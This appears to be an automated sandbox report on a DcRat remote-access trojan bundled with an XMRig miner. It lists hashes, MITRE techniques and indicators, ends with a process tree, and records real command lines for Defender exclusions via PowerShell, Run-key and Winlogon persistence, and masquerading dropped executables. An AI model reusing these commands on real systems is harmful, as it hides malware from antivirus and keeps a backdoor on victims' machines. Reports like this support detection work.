dcrat | 2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
02-02-2025 04:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe
Size

7.2MB
MD5

235215e48c6b826e256d5918cbb1b0da
SHA1

7045d2e4da8d6102e3e199af4b848cac4ca934e1
SHA256

2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91
SHA512

feb1b3315da05d4466be68c6bb70dfdeaeaf8cb92ced1023db84c0d66a1b40e7f0fa9bad2d9e421b580887e1134dc7e30a25d5f9dc48f4e0cb780ebd93899df4
SSDEEP

196608:FPU+TdWWQbrlUIxOthZr2GbxuvzN5wWYNRdRT:JU+T4LbrlbxOFr2GFuv7+NRL

Score

10^/10

dcrat xmrig defense_evasion discovery execution infostealer miner persistence rat spyware stealer upx

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Start Menu\\lsass.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Start Menu\\lsass.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\OSPPSVC.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Start Menu\\lsass.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\smss.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Start Menu\\lsass.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\", \"C:\\MSOCache\\All Users\\explorer.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\OSPPSVC.exe\", \"C:\\Program Files\\Windows Portable Devices\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Roaming\\DirecctX\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Start Menu\\lsass.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\Start Menu\\lsass.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\""	WIndowsDefendirCore.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2748	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1080	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2792	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2344	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1620	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1456	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2080	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3008	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2404	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2376	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2740	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	544	1608	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1624	1608	schtasks.exe	90

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral1/memory/1124-51-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-58-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-57-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-56-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-55-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-54-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-52-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-59-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/1124-60-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2500	powershell.exe
2980	powershell.exe
2832	powershell.exe
2580	powershell.exe
1284	powershell.exe
2888	powershell.exe
1944	powershell.exe
2680	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
2648	New.exe
2776	build.exe
476	Process not Found
2592	bjqgtalbkeyq.exe
3024	WIndowsDefendirCore.exe
872	smss.exe

Loads dropped DLL 6 IoCs

pid	Process
1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe
1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe
1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe
476	Process not Found
2060	cmd.exe
2060	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\OSPPSVC.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Portable Devices\\smss.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIndowsDefendirCore = "\"C:\\Users\\Admin\\AppData\\Roaming\\DirecctX\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIndowsDefendirCore = "\"C:\\Users\\Admin\\AppData\\Roaming\\DirecctX\\WIndowsDefendirCore.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\OSPPSVC.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\All Users\\Start Menu\\lsass.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\de\\services.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\explorer.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\explorer.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Program Files\\Windows Portable Devices\\smss.exe\""	WIndowsDefendirCore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\All Users\\Start Menu\\lsass.exe\""	WIndowsDefendirCore.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	pastebin.com
5	pastebin.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2044	powercfg.exe
1600	powercfg.exe
3056	powercfg.exe
2732	powercfg.exe
2700	powercfg.exe
2292	powercfg.exe
2740	powercfg.exe
656	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	bjqgtalbkeyq.exe
File created	\??\c:\Windows\System32\CSCFDB28C07E874A87A4CF89D1142104.TMP	csc.exe
File created	\??\c:\Windows\System32\8wawgv.exe	csc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2592 set thread context of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 set thread context of 1124	2592	bjqgtalbkeyq.exe	89

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1124-49-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-47-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-48-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-51-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-58-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-57-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-56-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-55-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-54-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-52-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-50-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-46-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-59-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/1124-60-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Portable Devices\smss.exe	WIndowsDefendirCore.exe
File opened for modification	C:\Program Files\Windows Portable Devices\smss.exe	WIndowsDefendirCore.exe
File created	C:\Program Files\Windows Portable Devices\69ddcba757bf72	WIndowsDefendirCore.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\OSPPSVC.exe	WIndowsDefendirCore.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\1610b97d3ab4a7	WIndowsDefendirCore.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe	WIndowsDefendirCore.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\c5b4cb5e9653cc	WIndowsDefendirCore.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
572	sc.exe
2864	sc.exe
1272	sc.exe
472	sc.exe
2228	sc.exe
560	sc.exe
848	sc.exe
2412	sc.exe
1592	sc.exe
2404	sc.exe
2376	sc.exe
576	sc.exe
1040	sc.exe
2868	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	New.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2384	PING.EXE

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e073300b2875db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	explorer.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2384	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2404	schtasks.exe
2736	schtasks.exe
2740	schtasks.exe
2748	schtasks.exe
1080	schtasks.exe
1804	schtasks.exe
3008	schtasks.exe
2376	schtasks.exe
2792	schtasks.exe
2344	schtasks.exe
1620	schtasks.exe
2212	schtasks.exe
2996	schtasks.exe
1624	schtasks.exe
1456	schtasks.exe
2080	schtasks.exe
2492	schtasks.exe
544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2776	build.exe
2500	powershell.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2776	build.exe
2592	bjqgtalbkeyq.exe
2980	powershell.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
2592	bjqgtalbkeyq.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe
3024	WIndowsDefendirCore.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeShutdownPrivilege	2700	powercfg.exe
Token: SeShutdownPrivilege	2732	powercfg.exe
Token: SeShutdownPrivilege	2292	powercfg.exe
Token: SeShutdownPrivilege	2740	powercfg.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeShutdownPrivilege	1600	powercfg.exe
Token: SeShutdownPrivilege	2044	powercfg.exe
Token: SeShutdownPrivilege	656	powercfg.exe
Token: SeShutdownPrivilege	3056	powercfg.exe
Token: SeLockMemoryPrivilege	1124	explorer.exe
Token: SeDebugPrivilege	3024	WIndowsDefendirCore.exe
Token: SeDebugPrivilege	1284	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2580	powershell.exe
Token: SeDebugPrivilege	872	smss.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 2648	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	30
PID 1892 wrote to memory of 2648	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	30
PID 1892 wrote to memory of 2648	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	30
PID 1892 wrote to memory of 2648	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	30
PID 1892 wrote to memory of 2776	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	31
PID 1892 wrote to memory of 2776	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	31
PID 1892 wrote to memory of 2776	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	31
PID 1892 wrote to memory of 2776	1892	2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe	31
PID 2648 wrote to memory of 2620	2648	New.exe	32
PID 2648 wrote to memory of 2620	2648	New.exe	32
PID 2648 wrote to memory of 2620	2648	New.exe	32
PID 2648 wrote to memory of 2620	2648	New.exe	32
PID 3008 wrote to memory of 1820	3008	cmd.exe	41
PID 3008 wrote to memory of 1820	3008	cmd.exe	41
PID 3008 wrote to memory of 1820	3008	cmd.exe	41
PID 1948 wrote to memory of 1548	1948	cmd.exe	71
PID 1948 wrote to memory of 1548	1948	cmd.exe	71
PID 1948 wrote to memory of 1548	1948	cmd.exe	71
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1744	2592	bjqgtalbkeyq.exe	85
PID 2592 wrote to memory of 1124	2592	bjqgtalbkeyq.exe	89
PID 2592 wrote to memory of 1124	2592	bjqgtalbkeyq.exe	89
PID 2592 wrote to memory of 1124	2592	bjqgtalbkeyq.exe	89
PID 2592 wrote to memory of 1124	2592	bjqgtalbkeyq.exe	89
PID 2592 wrote to memory of 1124	2592	bjqgtalbkeyq.exe	89
PID 2620 wrote to memory of 2060	2620	WScript.exe	91
PID 2620 wrote to memory of 2060	2620	WScript.exe	91
PID 2620 wrote to memory of 2060	2620	WScript.exe	91
PID 2620 wrote to memory of 2060	2620	WScript.exe	91
PID 2060 wrote to memory of 3024	2060	cmd.exe	93
PID 2060 wrote to memory of 3024	2060	cmd.exe	93
PID 2060 wrote to memory of 3024	2060	cmd.exe	93
PID 2060 wrote to memory of 3024	2060	cmd.exe	93
PID 3024 wrote to memory of 2764	3024	WIndowsDefendirCore.exe	98
PID 3024 wrote to memory of 2764	3024	WIndowsDefendirCore.exe	98
PID 3024 wrote to memory of 2764	3024	WIndowsDefendirCore.exe	98
PID 2764 wrote to memory of 2800	2764	csc.exe	100
PID 2764 wrote to memory of 2800	2764	csc.exe	100
PID 2764 wrote to memory of 2800	2764	csc.exe	100
PID 3024 wrote to memory of 2680	3024	WIndowsDefendirCore.exe	116
PID 3024 wrote to memory of 2680	3024	WIndowsDefendirCore.exe	116
PID 3024 wrote to memory of 2680	3024	WIndowsDefendirCore.exe	116
PID 3024 wrote to memory of 1944	3024	WIndowsDefendirCore.exe	117
PID 3024 wrote to memory of 1944	3024	WIndowsDefendirCore.exe	117
PID 3024 wrote to memory of 1944	3024	WIndowsDefendirCore.exe	117
PID 3024 wrote to memory of 2888	3024	WIndowsDefendirCore.exe	118
PID 3024 wrote to memory of 2888	3024	WIndowsDefendirCore.exe	118
PID 3024 wrote to memory of 2888	3024	WIndowsDefendirCore.exe	118
PID 3024 wrote to memory of 1284	3024	WIndowsDefendirCore.exe	119
PID 3024 wrote to memory of 1284	3024	WIndowsDefendirCore.exe	119
PID 3024 wrote to memory of 1284	3024	WIndowsDefendirCore.exe	119
PID 3024 wrote to memory of 2580	3024	WIndowsDefendirCore.exe	120
PID 3024 wrote to memory of 2580	3024	WIndowsDefendirCore.exe	120
PID 3024 wrote to memory of 2580	3024	WIndowsDefendirCore.exe	120
PID 3024 wrote to memory of 2832	3024	WIndowsDefendirCore.exe	121
PID 3024 wrote to memory of 2832	3024	WIndowsDefendirCore.exe	121
PID 3024 wrote to memory of 2832	3024	WIndowsDefendirCore.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe
"C:\Users\Admin\AppData\Local\Temp\2bcb3e1d1935ef764abf3b1e44a5d8a310be0f863253ea746ef3875316a43a91.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Users\Admin\AppData\Local\Temp\New.exe
  "C:\Users\Admin\AppData\Local\Temp\New.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\DirecctX\xxNjaoakdqlq77rW9ny37esSaaIYvVrl9XvRF2EmRo3BjUX9SZCU8jwS.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Roaming\DirecctX\emdqIIr51ANxc8YnT8oM67sWOC7lQfL50WxcLdlgUyJcLXMn.bat" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe
        
        "C:\Users\Admin\AppData\Roaming\DirecctX/WIndowsDefendirCore.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3024
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hfuacgu3\hfuacgu3.cmdline"
        6⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:2764
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE7B0.tmp" "c:\Windows\System32\CSCFDB28C07E874A87A4CF89D1142104.TMP"
        7⤵
        
        PID:2800
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\lsass.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\de\services.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\explorer.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\OSPPSVC.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1284
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\smss.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2580
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\DirecctX\WIndowsDefendirCore.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
